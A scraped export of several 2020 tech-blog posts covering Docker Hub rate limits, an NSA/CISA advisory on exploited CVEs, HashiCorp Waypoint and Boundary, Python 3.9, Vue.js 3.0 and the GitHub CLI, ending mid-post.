Docker\u0026rsquo;s registry supports a pull-through cache configuration. You run a local registry that proxies and caches Docker Hub images. First pull goes to Docker Hub; subsequent pulls are served from your cache. 
For organizations with multiple teams and CI pipelines, this dramatically reduces external pull traffic.\n# registry config.yml\nproxy:\n  remoteurl: https://registry-1.docker.io\n  username: your-dockerhub-user\n  password: your-dockerhub-token\nThis is what I\u0026rsquo;d recommend for any organization with more than a handful of developers. The setup is straightforward, it works with existing Docker clients (just configure the mirror in daemon.json), and it also speeds up pulls significantly since images are served from your local network.\nUse Multi-Stage Builds Efficiently # If your Dockerfiles pull the same base image in multiple stages, Docker counts each unique pull. But with proper layer caching on your build machines, images that are already present locally don\u0026rsquo;t generate pulls. Make sure your CI runners aren\u0026rsquo;t starting from a clean slate every build — or if they are, use docker pull strategically and leverage build caching.\nConsider Alternative Registries # This might be a good time to evaluate whether all your base images need to come from Docker Hub. Google Container Registry (gcr.io) hosts mirrors of many popular images. Amazon ECR Public launched earlier this month. GitHub Container Registry is in beta. Diversifying your image sources reduces dependency on any single registry.\nPin Image Digests # If you\u0026rsquo;re pulling by tag (e.g., node:14-alpine), every pull checks Docker Hub even if the underlying image hasn\u0026rsquo;t changed. Pinning to a specific digest (node@sha256:abc123...) allows Docker to skip the pull entirely if the image is already cached locally. This is a best practice regardless of rate limits — it also improves reproducibility.\nMy Take: Docker Hub\u0026rsquo;s Tragedy of the Commons # I have mixed feelings about this change. On one hand, Docker Hub has been providing an incredibly valuable service for free, and the cost of serving billions of pulls per day is substantial. 
The rate limits are generous enough that individual developers and small teams won\u0026rsquo;t notice. Docker needs a sustainable business model, and \u0026ldquo;giving everything away forever\u0026rdquo; isn\u0026rsquo;t one.\nOn the other hand, Docker Hub has positioned itself as the default registry for the entire container ecosystem. The docker pull command defaults to Docker Hub. Every tutorial, every getting-started guide, every FROM instruction in public Dockerfiles assumes Docker Hub. When you\u0026rsquo;re the default, you have a responsibility to the ecosystem that depends on you.\nThe timing also feels rough. We\u0026rsquo;re eight months into a pandemic, teams are stretched thin, and adding \u0026ldquo;fix all our Docker Hub authentication\u0026rdquo; to the operations backlog is unwelcome. Many organizations are discovering their pull volumes for the first time this week and scrambling.\nWhat this really highlights is the risk of depending on a single point of infrastructure you don\u0026rsquo;t control. We learned this lesson with npm (remember the left-pad incident in 2016?), and we\u0026rsquo;re learning it again with Docker Hub. If your builds can\u0026rsquo;t succeed without pulling images from a third-party service, you have a resilience problem.\nSet up a pull-through cache, authenticate your CI runners, and use this as motivation to evaluate your container supply chain. The rate limits aren\u0026rsquo;t going away, and honestly, they\u0026rsquo;re probably going to get tighter over time.\n","date":"29 October 2020","externalUrl":null,"permalink":"/posts/201029-docker-hub-rate-limiting/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Docker Hub’s new rate limits take effect November 1st. 
If you haven’t prepared your build pipelines, you’re about to find out the hard way.","title":"Docker Hub Rate Limits Are Coming — And Your CI Pipeline Might Break","type":"posts"},{"content":"This week, the NSA and CISA published a joint cybersecurity advisory detailing 25 CVEs that Chinese state-sponsored threat actors are actively exploiting. If you work in software and haven\u0026rsquo;t read it, you should. Not because the vulnerabilities are exotic — quite the opposite. The uncomfortable truth is that nearly every entry on the list has had patches available for months or even years. This isn\u0026rsquo;t a story about sophisticated zero-days. It\u0026rsquo;s a story about the basics.\nThe List That Should Keep You Up at Night # The advisory covers vulnerabilities across a wide range of products: Microsoft Exchange, Citrix ADC, Pulse Secure VPN, F5 BIG-IP, Atlassian Confluence, and several others. Here are some of the notable entries:\nCVE-2019-19781 (Citrix ADC) — Disclosed December 2019, exploited in the wild within weeks. Still being targeted in October 2020.\nCVE-2020-5902 (F5 BIG-IP) — Disclosed July 2020, CVSS 9.8. Exploitation began almost immediately.\nCVE-2019-11510 (Pulse Secure VPN) — Disclosed April 2019. Over a year old and still being used.\nCVE-2020-0688 (Microsoft Exchange) — February 2020 patch. Eight months later, still an active attack vector.\nThe pattern is clear: public disclosure, patch release, and then a race between defenders applying the fix and attackers exploiting those who haven\u0026rsquo;t. The attackers are winning that race far too often.\nWhy Patching Remains So Hard # It\u0026rsquo;s easy to sit in an armchair and say \u0026ldquo;just patch your systems.\u0026rdquo; Anyone who\u0026rsquo;s managed production infrastructure knows it\u0026rsquo;s not that simple. But we need to be honest about why.\nLegacy dependencies: Many organizations run software that requires specific versions of underlying platforms. 
Patching the VPN appliance might break compatibility with the legacy ERP system that generates revenue. I\u0026rsquo;ve been in those meetings where the risk of patching is weighed against the risk of not patching, and the business case often wins in the wrong direction.\nTesting overhead: Proper patch validation requires staging environments that mirror production. For complex enterprises, this means weeks of testing before a patch can be rolled out. Meanwhile, the vulnerability is being actively exploited.\nVisibility gaps: You can\u0026rsquo;t patch what you don\u0026rsquo;t know you have. Shadow IT, forgotten appliances, acquired company infrastructure that was never fully inventoried — these are the systems that sit unpatched for years. The Pulse Secure VPNs still being exploited aren\u0026rsquo;t in well-managed environments; they\u0026rsquo;re the ones that fell off someone\u0026rsquo;s radar.\nUpdate fatigue: Between OS patches, application updates, firmware updates, and security advisories from dozens of vendors, IT teams are drowning in patches. Prioritization is essential but imperfect. The CVE scoring system helps, but a CVSS score of 9.8 doesn\u0026rsquo;t automatically mean your team will get to it this sprint.\nThe Supply Chain Angle # What caught my attention in the advisory is the inclusion of several network infrastructure products — VPN concentrators, application delivery controllers, load balancers. These are the devices that sit at the perimeter of networks and are, by definition, exposed to the internet. They\u0026rsquo;re also the devices most likely to be managed by a different team than the one responsible for application security.\nThis is the supply chain problem in microcosm. 
Your application code might be secure, your containers might be scanned, your CI/CD pipeline might enforce security gates — but if the VPN appliance in front of it all has a year-old unpatched RCE vulnerability, none of that matters.\nThe advisory also lists CVEs in Apache Struts (CVE-2017-5638, the Equifax breach vulnerability from 2017) and Confluence Server. These are application-layer vulnerabilities in software that many organizations deploy internally without the same patching discipline they apply to operating systems.\nWhat To Actually Do About It # Reading advisories like this can feel overwhelming, but there are concrete steps:\nAsset inventory first: You cannot secure what you cannot see. If you don\u0026rsquo;t have a comprehensive, up-to-date inventory of internet-facing assets and their software versions, that\u0026rsquo;s job number one. Tools like Shodan can help you discover what your organization has exposed.\nPrioritize by exposure: Not all of the 25 CVEs are equally relevant to every organization. Focus on what\u0026rsquo;s internet-facing and what\u0026rsquo;s in your stack. Cross-reference the advisory against your inventory.\nAutomate where possible: Configuration management tools (Ansible, Puppet, Chef) and infrastructure-as-code practices reduce the time from \u0026ldquo;patch available\u0026rdquo; to \u0026ldquo;patch deployed.\u0026rdquo; If patching still involves manual SSH sessions and maintenance windows scheduled by email, that\u0026rsquo;s a process problem.\nAssume breach: Given the length of time these vulnerabilities have been exploited, it\u0026rsquo;s worth assuming that if you had an unpatched system, it may already be compromised. 
Incident response planning and detection capabilities (logging, monitoring, EDR) are as important as patching.\nMy Take: This Is a Governance Failure # I\u0026rsquo;ve been in this industry long enough to know that the response to advisories like this will follow the usual pattern: a week of urgency, a flurry of patching activity, and then a slow return to the status quo. The next advisory will list different CVE numbers but the same underlying problem.\nThe root cause isn\u0026rsquo;t technical — it\u0026rsquo;s organizational. Patch management is a solved problem technically. We have the tools, the automation, the processes. What we lack is the governance framework that gives security teams the authority and resources to enforce timely patching, even when it\u0026rsquo;s inconvenient for the business.\nState-sponsored actors are not going to wait for your change management board to meet. The 25 CVEs in this advisory are the known ones being exploited right now. The question isn\u0026rsquo;t whether your organization has vulnerabilities — it\u0026rsquo;s whether you know about them and have a credible plan to address them.\nIf this advisory prompts one thing in your organization, let it be an honest assessment of your patching posture. Not the patching posture you report in compliance audits, but the real one.\n","date":"22 October 2020","externalUrl":null,"permalink":"/posts/201022-nsa-cisa-china-advisory/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A joint NSA/CISA advisory details 25 CVEs actively exploited by Chinese state-sponsored actors. 
The uncomfortable truth: most are well-known and patchable.","title":"NSA and CISA Sound the Alarm on Known Vulnerabilities — And We Should Listen","type":"posts"},{"content":"HashiConf Digital wrapped up this week, and HashiCorp dropped two new open-source projects that are clearly aimed at the gaps in their existing ecosystem: Waypoint for application deployment workflows and Boundary for secure remote access. After spending the past few days digging into both, I think they address real pain points — but the execution will determine whether they actually get traction.\nIf you\u0026rsquo;ve worked with HashiCorp\u0026rsquo;s stack (Terraform, Vault, Consul, Nomad), you know the tools are excellent individually but integrating them into a cohesive developer experience requires significant glue code and tribal knowledge. Waypoint and Boundary feel like an acknowledgment of that gap.\nWaypoint: One Workflow to Deploy Them All # Waypoint\u0026rsquo;s pitch is straightforward: define a waypoint.hcl file, run waypoint up, and your application gets built, deployed, and released — regardless of whether the target is Kubernetes, ECS, Nomad, or a plain Docker host. It\u0026rsquo;s an abstraction layer over deployment, similar in spirit to what Terraform does for infrastructure provisioning.\nproject = \u0026#34;my-app\u0026#34;\napp \u0026#34;web\u0026#34; {\n  build {\n    use \u0026#34;docker\u0026#34; {}\n  }\n  deploy {\n    use \u0026#34;kubernetes\u0026#34; {\n      probe_path = \u0026#34;/health\u0026#34;\n    }\n  }\n  release {\n    use \u0026#34;kubernetes\u0026#34; {\n      load_balancer = true\n    }\n  }\n}\nWhat\u0026rsquo;s interesting is the explicit separation of build, deploy, and release phases. This isn\u0026rsquo;t new conceptually — we\u0026rsquo;ve been talking about this pattern since at least the Twelve-Factor App — but having it as a first-class concern in a deployment tool is nice. 
The release phase in particular, which handles traffic shifting and load balancer configuration, is where things usually get messy in practice.\nI\u0026rsquo;ve seen too many teams where deployment is a combination of shell scripts, CI pipeline steps, and kubectl commands stitched together with hope and documentation. Waypoint could clean that up, but only if it handles the edge cases. The initial plugin ecosystem covers the basics (Docker, Kubernetes, AWS ECS, Nomad), but real-world deployments inevitably involve custom steps — database migrations, feature flag updates, cache warming. The plugin architecture will need to be robust and extensible.\nBoundary: Identity-Based Access for the Zero Trust Era # Boundary is the more strategically interesting of the two launches. It\u0026rsquo;s a secure remote access solution built around identity rather than IP-based rules. Think of it as a modern replacement for VPNs and SSH bastion hosts, integrated with your identity provider.\nThe traditional approach to accessing internal infrastructure — VPN in, then SSH to a bastion, then hop to the target — is clunky and creates a poor audit trail. Boundary provides direct, authenticated access to resources based on who you are and what you\u0026rsquo;re authorized to do, with full session recording and logging.\nThis fits perfectly alongside Vault. Where Vault manages secrets and dynamic credentials, Boundary manages the access paths themselves. Together, they form a zero-trust access layer: Boundary authenticates and authorizes the session, Vault provides just-in-time credentials, and everything is logged and auditable.\nFor teams managing hybrid infrastructure — some on-prem, some in cloud, maybe multiple clouds — this is a compelling proposition. 
The identity-based approach means you don\u0026rsquo;t need to maintain complex network peering or VPN configurations just to let a developer access a staging database.\nThe Bigger Picture: HashiCorp\u0026rsquo;s Platform Play # These launches make HashiCorp\u0026rsquo;s strategy clear. They\u0026rsquo;re building a complete platform for infrastructure and application lifecycle management:\nTerraform provisions infrastructure\nVault manages secrets and credentials\nConsul handles service networking and discovery\nNomad (or Kubernetes) orchestrates workloads\nBoundary controls access to everything\nWaypoint gives developers a simple deployment interface\nEach tool works standalone and is open-source, but the real value proposition is the integrated cloud platform (HashiCorp Cloud Platform). It\u0026rsquo;s the classic open-source-to-enterprise playbook, and HashiCorp executes it better than most.\nI\u0026rsquo;ve been running Terraform and Vault in production for years, and the quality of the open-source offerings has consistently been high. But I\u0026rsquo;ve also seen organizations struggle with the operational overhead of running the full stack. HCP promises to reduce that, though at a cost that\u0026rsquo;s worth scrutinizing.\nMy Take: Promising, But Give It Time # Waypoint and Boundary are both at version 0.1.0, which means they\u0026rsquo;re nowhere near production-ready for most use cases. HashiCorp is transparent about this — the launch is about establishing direction and building community, not declaring victory.\nMy concerns with Waypoint are around flexibility. Deployment abstractions have been attempted many times (Heroku, Cloud Foundry, various PaaS offerings, even docker-compose in its own way), and they tend to work brilliantly for the 80% case and then fight you on the remaining 20%. 
HashiCorp\u0026rsquo;s track record with Terraform\u0026rsquo;s provider ecosystem gives me some confidence they understand extensibility, but it\u0026rsquo;s early days.\nBoundary I\u0026rsquo;m more bullish on, because it solves a problem that\u0026rsquo;s genuinely underserved by existing open-source tools. Commercial solutions like Teleport exist, but an open-source, identity-native access proxy from HashiCorp — with Vault integration — is a strong offering. The zero-trust access model is clearly where the industry is heading, especially with distributed teams becoming the norm rather than the exception in 2020.\nIf you\u0026rsquo;re already in the HashiCorp ecosystem, keep an eye on both. If you\u0026rsquo;re evaluating new infrastructure tooling, Boundary is the one I\u0026rsquo;d recommend experimenting with sooner rather than later. Waypoint needs at least a few more releases before I\u0026rsquo;d consider it for anything beyond personal projects.\nThe infrastructure tooling space continues to mature, and it\u0026rsquo;s encouraging to see HashiCorp investing in developer experience alongside the operations side. The best infrastructure is the kind developers don\u0026rsquo;t have to think about — and these tools are a step in that direction.\n","date":"15 October 2020","externalUrl":null,"permalink":"/posts/201015-hashicorp-waypoint-boundary/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"HashiCorp announced two new open-source tools at HashiConf Digital — Waypoint for application deployment and Boundary for secure remote access. Here’s why they matter.","title":"HashiCorp Launches Waypoint and Boundary — Closing the Developer Experience Gap","type":"posts"},{"content":"Python 3.9 officially landed on October 5th, right on schedule with the new annual release cadence. 
While most of the coverage is focused on the shiny new dictionary merge operator (|), there\u0026rsquo;s a lot more going on under the hood that deserves attention — particularly for those of us running Python in production environments.\nHaving tracked Python releases since the 2.x days, I can tell you that 3.9 feels like one of those \u0026ldquo;quietly important\u0026rdquo; releases. Not as dramatic as the 2-to-3 migration, but the kind of steady improvement that compounds over time.\nThe New PEG Parser # The headline feature that nobody\u0026rsquo;s talking about is PEP 617 — the switch from the old LL(1) parser to a new PEG-based parser. On the surface, this changes nothing for existing code. Your scripts will parse and run identically. But this is a foundational change.\nThe LL(1) parser had real limitations. Grammar hacks and workarounds littered the CPython codebase because certain constructs simply couldn\u0026rsquo;t be expressed cleanly. The new PEG parser removes these constraints, which means future Python versions can introduce syntax that was previously impossible or impractical. Later Python releases continued to leverage this parser foundation for new capabilities. Think of it as replacing the foundation of a house — the rooms look the same today, but you can now build additions that weren\u0026rsquo;t structurally possible before.\nFor Python 3.9, both parsers ship side by side, with PEG as the default. The old parser is still available via a flag for anyone who hits edge cases. That\u0026rsquo;s the kind of careful migration strategy I appreciate in a language that powers everything from data science notebooks to critical infrastructure.\nDictionary Merge and Update Operators # Now, the feature everyone\u0026rsquo;s actually excited about — PEP 584. 
You can now merge dictionaries with | and update with |=:\nconfig_defaults = {\u0026#34;timeout\u0026#34;: 30, \u0026#34;retries\u0026#34;: 3} user_overrides = {\u0026#34;timeout\u0026#34;: 60, \u0026#34;debug\u0026#34;: True} merged = config_defaults | user_overrides # {\u0026#39;timeout\u0026#39;: 60, \u0026#39;retries\u0026#39;: 3, \u0026#39;debug\u0026#39;: True} Is this a game-changer? Not really. We\u0026rsquo;ve had {**d1, **d2} since Python 3.5, and dict.update() since forever. But the new syntax is cleaner and more readable, especially when you\u0026rsquo;re chaining multiple merges. Python language evolution continued to prioritize developer experience. In configuration management code — which I write a lot of — this is a genuine quality-of-life improvement.\nThe |= update operator is particularly nice for in-place modifications without needing a separate method call. It follows the pattern established by sets, which already support | for union operations. Consistency in language design matters more than people think.\nType Hinting Gets Simpler # PEP 585 is the change that\u0026rsquo;ll affect my daily coding the most. You can now use built-in collection types directly in type hints instead of importing from typing:\n# Before from typing import List, Dict, Tuple def process(items: List[Dict[str, Tuple[int, ...]]]) -\u0026gt; None: ... # Python 3.9 def process(items: list[dict[str, tuple[int, ...]]]) -\u0026gt; None: ... This might seem trivial, but when you\u0026rsquo;ve got a codebase where every module starts with from typing import ..., eliminating that boilerplate is welcome. More importantly, it makes type hints feel like a first-class citizen rather than an add-on library feature. 
I\u0026rsquo;ve been pushing type hints on my teams for the past two years, and any friction reduction helps adoption.\nTimezone Support and String Methods # Two smaller additions that deserve mention: PEP 615 adds IANA timezone support to the standard library via zoneinfo. No more reaching for pytz for basic timezone operations. As someone who\u0026rsquo;s debugged timezone-related production incidents more times than I care to admit, having this in stdlib is overdue.\nThe new str.removeprefix() and str.removesuffix() methods (PEP 616) also fill a gap that\u0026rsquo;s caused subtle bugs. I\u0026rsquo;ve seen too many uses of lstrip() where developers assumed it strips a prefix rather than a set of characters. The new methods do exactly what the name says, nothing more.\nMy Take: The Maturation Continues # Python 3.9 isn\u0026rsquo;t flashy, and that\u0026rsquo;s exactly what I want from a language release in 2020. The Python core team has found a good rhythm with annual releases — each one delivers enough to be worth upgrading without breaking the world.\nMy main concern is the ongoing fragmentation in deployment environments. With Python 2 finally end-of-lifed in January, and now four maintained 3.x versions (3.6 through 3.9), library maintainers still carry a significant compatibility burden. The proposed deprecation of distutils (PEP 632, which targets 3.10 rather than 3.9) and the ongoing packaging ecosystem improvements are steps in the right direction, but we\u0026rsquo;re not there yet.\nFor production environments, I\u0026rsquo;d recommend waiting for 3.9.1 (expected in December) before deploying. First point releases always catch the early bugs that only show up at scale. In the meantime, start testing your CI pipelines against 3.9 and update your type hints to use the new syntax. On 3.7 and 3.8 the new syntax still works in annotations, as long as the module starts with from __future__ import annotations.\nThe new parser is the real story here. 
It\u0026rsquo;s the kind of long-term investment that pays dividends over the next decade of Python development. The features in 3.10 and beyond will likely be more ambitious because of it.\n","date":"8 October 2020","externalUrl":null,"permalink":"/posts/201008-python39-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.9 dropped this week with new parser, dict merge operators, and type hinting improvements — here’s what actually matters for production code.","title":"Python 3.9 Is Here — And It's More Than Just Dictionary Merging","type":"posts"},{"content":"Python 3.9 is officially out, and while it doesn\u0026rsquo;t have the dramatic headline of Python 2\u0026rsquo;s end-of-life (RIP, January 2020), it\u0026rsquo;s packed with quality-of-life improvements that reflect where the language is heading. This is the first version to drop support for Windows 7, the first built with a new parser, and it brings some syntactic sugar that I\u0026rsquo;ve been wanting for years.\nLet me walk through what matters.\nDictionary Merge and Update Operators # This is the one I\u0026rsquo;m most excited about. 
Python 3.9 introduces the | operator for merging dictionaries and |= for updating them in place:\n# Merging dictionaries — creates a new dict defaults = {\u0026#34;color\u0026#34;: \u0026#34;blue\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;medium\u0026#34;} overrides = {\u0026#34;size\u0026#34;: \u0026#34;large\u0026#34;, \u0026#34;weight\u0026#34;: \u0026#34;heavy\u0026#34;} config = defaults | overrides # {\u0026#39;color\u0026#39;: \u0026#39;blue\u0026#39;, \u0026#39;size\u0026#39;: \u0026#39;large\u0026#39;, \u0026#39;weight\u0026#39;: \u0026#39;heavy\u0026#39;} # Update in place defaults |= overrides Before this, you had several options, none of them great:\n# The unpacking approach (3.5+) config = {**defaults, **overrides} # The copy-and-update approach config = defaults.copy() config.update(overrides) # The ChainMap approach from collections import ChainMap config = dict(ChainMap(overrides, defaults)) The unpacking syntax {**a, **b} works but isn\u0026rsquo;t obvious to newcomers, and it doesn\u0026rsquo;t generalize to update-in-place. The | operator is clean, readable, and consistent with set operations that already use the same symbol. It\u0026rsquo;s one of those changes where you wonder why it took so long — and then you read the PEP discussions and remember that Python\u0026rsquo;s design process is thorough to a fault.\nType Hinting Gets Simpler # PEP 585 brings a change I\u0026rsquo;ve been looking forward to: you can now use built-in collection types directly in type hints instead of importing from typing:\n# Before (still works, but verbose) from typing import List, Dict, Tuple def process(items: List[str]) -\u0026gt; Dict[str, Tuple[int, int]]: ... # Python 3.9 def process(items: list[str]) -\u0026gt; dict[str, tuple[int, int]]: ... No more from typing import List, Dict, Set, Tuple, FrozenSet. You just use list, dict, set, tuple directly with subscripts. 
The typing module equivalents are now deprecated (though they\u0026rsquo;ll work for the foreseeable future).\nThis pairs nicely with PEP 604, which lets you write X | Y instead of Union[X, Y]. One caveat: PEP 604 targets Python 3.10, not 3.9, so on 3.9 the new form only works inside annotations, and only when the module starts with from __future__ import annotations. The dictionary merge operator combined with the upcoming union syntax shows Python\u0026rsquo;s steady evolution toward more expressive syntax while maintaining backward compatibility:\n# Before from typing import Union def fetch(id: Union[int, str]) -\u0026gt; Union[dict, None]: ... # Python 3.10+ def fetch(id: int | str) -\u0026gt; dict | None: ... These changes reduce the boilerplate tax of type hints significantly. I\u0026rsquo;ve seen teams resist adopting type hints partly because of the import overhead and verbose syntax. These improvements remove that excuse.\nThe New PEG Parser # Under the hood, Python 3.9 ships with a completely new parser based on Parsing Expression Grammar (PEG), replacing the LL(1) parser that Python has used since its inception. The old parser is still available via -X oldparser but is scheduled for removal in 3.10.\nFor most developers, this change is invisible — existing syntax parses exactly the same way. The significance is in what it enables for future versions. The LL(1) parser had fundamental limitations that made certain syntax proposals impossible. The PEG parser doesn\u0026rsquo;t share those constraints, which opens the door for more expressive syntax in future Python releases.\nThe Python core team has been careful to note that the new parser produces identical results for all existing Python code. This is a foundation change, not a feature change — its impact will be felt in future releases, not this one.\nString Methods and Time Zone Support # Two smaller additions worth mentioning:\nstr.removeprefix() and str.removesuffix() are finally here. 
If you\u0026rsquo;ve ever written this pattern:\nif filename.startswith(\u0026#34;test_\u0026#34;): name = filename[len(\u0026#34;test_\u0026#34;):] You can now write:\nname = filename.removeprefix(\u0026#34;test_\u0026#34;) It\u0026rsquo;s safer (no off-by-one on the slice length) and more readable. I\u0026rsquo;ve had helper functions for this in my personal utility libraries for years. Nice to see it in the standard library.\nOn the time zone front, the zoneinfo module brings IANA time zone support into the standard library. No more reaching for pytz for basic time zone handling:\nfrom zoneinfo import ZoneInfo from datetime import datetime dt = datetime.now(tz=ZoneInfo(\u0026#34;Europe/Amsterdam\u0026#34;)) As someone based in the Netherlands, I appreciate not needing a third-party package just to correctly represent my local time.\nMy Take # Python 3.9 is not a revolutionary release, and that\u0026rsquo;s perfectly fine. The language is in a phase where incremental refinement serves the community better than dramatic changes. The dictionary operators and simplified type hints are exactly the kind of improvements that make daily coding a little smoother without requiring anyone to relearn the language.\nThe PEG parser is the most strategically important change, even though you won\u0026rsquo;t notice it today. It\u0026rsquo;s an investment in Python\u0026rsquo;s future expressiveness, and I\u0026rsquo;m curious to see what syntax proposals emerge now that the parser is no longer the bottleneck.\nIf you\u0026rsquo;re still on 3.7 or 3.8, there\u0026rsquo;s no urgent reason to upgrade immediately — but start testing your codebases against 3.9 now. The typing improvements alone are worth the move for any team that\u0026rsquo;s invested in type hints. And those dictionary merge operators? They\u0026rsquo;re going to become second nature faster than you\u0026rsquo;d expect.\nPython continues its steady march forward. No hype, no drama, just consistent improvement. 
After thirty years of watching programming languages come and go, I can tell you that\u0026rsquo;s exactly the recipe for longevity.\n","date":"1 October 2020","externalUrl":null,"permalink":"/posts/201001-python-39-new-features/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.9 arrives with dictionary merge operators, relaxed type hint syntax, and a new parser that sets the stage for the language’s future.","title":"Python 3.9 — Dictionary Unions, Type Hints, and the Steady March Forward","type":"posts"},{"content":"Last Friday, Evan You officially released Vue.js 3.0, codenamed \u0026ldquo;One Piece.\u0026rdquo; After more than two years of development and extensive community RFC processes, the third major version of Vue is here — and it\u0026rsquo;s not an incremental update. It\u0026rsquo;s a ground-up rewrite in TypeScript with fundamental changes to the reactivity system, component model, and rendering pipeline.\nI\u0026rsquo;ve been keeping an eye on Vue since its early days, and while I primarily work on backend systems, the frontend framework landscape directly impacts every full-stack project I touch. Vue 3 represents some genuinely interesting architectural decisions that are worth examining, regardless of your framework allegiance.\nThe Composition API # The headline feature is the Composition API, and it addresses a real problem that anyone who\u0026rsquo;s built complex Vue 2 applications has encountered: component organization doesn\u0026rsquo;t scale well with the Options API.\nIn Vue 2, you organize code by option type — all data in one block, all methods in another, all computed properties in yet another. For small components, this is clean and readable. For large components with multiple logical concerns, it means that related code gets scattered across the file. Your search feature\u0026rsquo;s data is in data(), its methods in methods, its computed properties in computed, and its watchers in watch. 
Understanding the search feature means jumping back and forth across the component.\nThe Composition API lets you organize by logical concern instead:\nimport { ref, computed, onMounted } from \u0026#39;vue\u0026#39; export default { setup() { // Search feature — all together const searchQuery = ref(\u0026#39;\u0026#39;) const results = ref([]) const hasResults = computed(() =\u0026gt; results.value.length \u0026gt; 0) async function search() { results.value = await fetchResults(searchQuery.value) } // Pagination — all together const page = ref(1) const pageSize = ref(20) function nextPage() { page.value++ } onMounted(() =\u0026gt; search()) return { searchQuery, results, hasResults, search, page, nextPage } } } More importantly, these logical blocks can be extracted into composable functions — Vue\u0026rsquo;s answer to React\u0026rsquo;s hooks. A useSearch() function can encapsulate the search logic and be reused across components with full reactivity intact.\nThe Options API isn\u0026rsquo;t going away, which is a smart decision. Existing codebases and developers who prefer the structured approach can continue as before. The Composition API is additive, not a replacement.\nPerformance Gains # The performance improvements are substantial and come from multiple angles. The virtual DOM has been rewritten with a compiler-informed strategy. Vue 3\u0026rsquo;s template compiler analyzes templates at build time and generates optimized rendering code that skips static content during diffing.\nConsider a template with mostly static content and a few dynamic bindings. Vue 2 would diff the entire virtual DOM tree on every update. Vue 3\u0026rsquo;s compiler marks static subtrees and hoists them out of the render function entirely. Only the dynamic parts participate in the diff process.\nThe numbers the team is reporting are impressive: up to 2x faster mounting, 2-3x faster updates, and up to 50% less memory usage compared to Vue 2. 
In tree-shaking scenarios, a minimal Vue 3 application weighs in at around 10KB gzipped versus Vue 2\u0026rsquo;s approximately 23KB baseline.\nTypeScript from the Ground Up # Vue 3 is written entirely in TypeScript, and the difference in developer experience is immediately noticeable. Vue 2\u0026rsquo;s TypeScript support always felt bolted on — class-based components through vue-class-component, decorated properties, and type definitions that didn\u0026rsquo;t always match the runtime behavior.\nWith Vue 3, TypeScript support is native. The Composition API\u0026rsquo;s function-based approach maps naturally to TypeScript\u0026rsquo;s type inference:\nconst count = ref(0) // Ref\u0026lt;number\u0026gt; — inferred const doubled = computed(() =\u0026gt; count.value * 2) // ComputedRef\u0026lt;number\u0026gt; — inferred Props get proper type checking, emits can be typed, and the entire API surface has accurate type definitions because the types come from the same codebase as the runtime.\nFor teams that have been gradually adopting TypeScript (and at this point, who isn\u0026rsquo;t?), this removes one of the biggest friction points of using Vue in a typed codebase.\nThe Migration Question # Here\u0026rsquo;s where it gets real: migration. Vue 3 introduces breaking changes. The filter syntax is removed. Event bus patterns using $on, $off, and $once are gone. The global API surface has changed. Some widely-used community libraries aren\u0026rsquo;t compatible yet.\nThe Vue team is taking a pragmatic approach with a migration build that provides Vue 2 compatible behavior while emitting deprecation warnings. It\u0026rsquo;s not a drop-in replacement, but it\u0026rsquo;s a migration path — which is more than some framework major versions have offered.\nMy advice for teams considering migration: wait a few months. Let the ecosystem catch up. Libraries like Vue Router, Vuex, and popular UI frameworks need time to ship Vue 3 compatible versions. Starting a new project? 
Vue 3 is ready. Migrating a large existing application? Patience will serve you better than haste.\nMy Take # What impresses me most about Vue 3 isn\u0026rsquo;t any single feature — it\u0026rsquo;s the discipline of the process. The RFC system meant that major API changes were debated publicly before implementation. The two-year timeline, while longer than initially planned, reflects a team that chose to get it right over getting it shipped.\nThe Composition API is a genuine advancement in component design patterns, not just for Vue but as an idea. The performance work shows that framework-level optimization still has meaningful headroom. And the TypeScript rewrite positions Vue well for the next several years of frontend development.\nEvan You and the Vue team deserve credit for pulling off a major framework rewrite without fragmenting the community. That\u0026rsquo;s harder than the technical work, and they seem to be managing it well. Vue 3.0 is a solid foundation — now let\u0026rsquo;s see the ecosystem build on it.\n","date":"24 September 2020","externalUrl":null,"permalink":"/posts/200924-vuejs-3-one-piece-rewrite/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Vue.js 3.0 ships after two years of development with a TypeScript rewrite, Composition API, and significant performance improvements.","title":"Vue.js 3.0 'One Piece' — A Complete Rewrite Worth the Wait","type":"posts"},{"content":"GitHub just shipped CLI 1.0, and as someone who has spent most of his career in a terminal, I\u0026rsquo;m genuinely pleased. The gh command brings GitHub\u0026rsquo;s core workflows — pull requests, issues, releases, repository management — directly into the command line, without the context-switching overhead of opening a browser.\nYes, there have been third-party tools like hub doing some of this for years. But there\u0026rsquo;s something meaningful about the official GitHub team building and maintaining this. 
It signals that terminal-first workflows aren\u0026rsquo;t a niche preference — they\u0026rsquo;re a first-class development pattern.\nWhat You Can Actually Do # The 1.0 release covers the workflows that most developers interact with daily. Here\u0026rsquo;s what stood out to me:\nPull Requests are the star of the show. You can create, review, check out, and merge PRs without leaving your terminal:\n# Create a PR from the current branch gh pr create --title \u0026#34;Fix caching bug\u0026#34; --body \u0026#34;Resolves #42\u0026#34; # Check out someone else\u0026#39;s PR locally gh pr checkout 123 # Review and approve gh pr review 123 --approve # Merge when ready gh pr merge 123 --squash Issues get similar treatment. Create them, list them, view them, close them — all from the command line. The gh issue create command even supports labels and assignees directly.\nRepository operations round things out. You can create repos, fork them, clone them (with gh repo clone owner/repo instead of remembering the full URL), and view their details.\nWhat I appreciate is the interactive mode. Running gh pr create without flags drops you into a guided flow that asks for title, body, reviewers, and labels. It\u0026rsquo;s a thoughtful design choice — scriptable when you need automation, interactive when you\u0026rsquo;re working manually.\nWhy This Matters More Than You Think # I can hear the skeptics: \u0026ldquo;I can do all of this in the browser.\u0026rdquo; Of course you can. But that\u0026rsquo;s missing the point.\nThe value isn\u0026rsquo;t in any single command — it\u0026rsquo;s in maintaining flow state. When I\u0026rsquo;m deep in a debugging session, tracking down a race condition across three services, the last thing I want is to switch to a browser, navigate to the right repo, click through the PR creation form, and then try to remember where I was in my terminal.\nWith gh, the workflow is:\nFix the bug in your editor git add . 
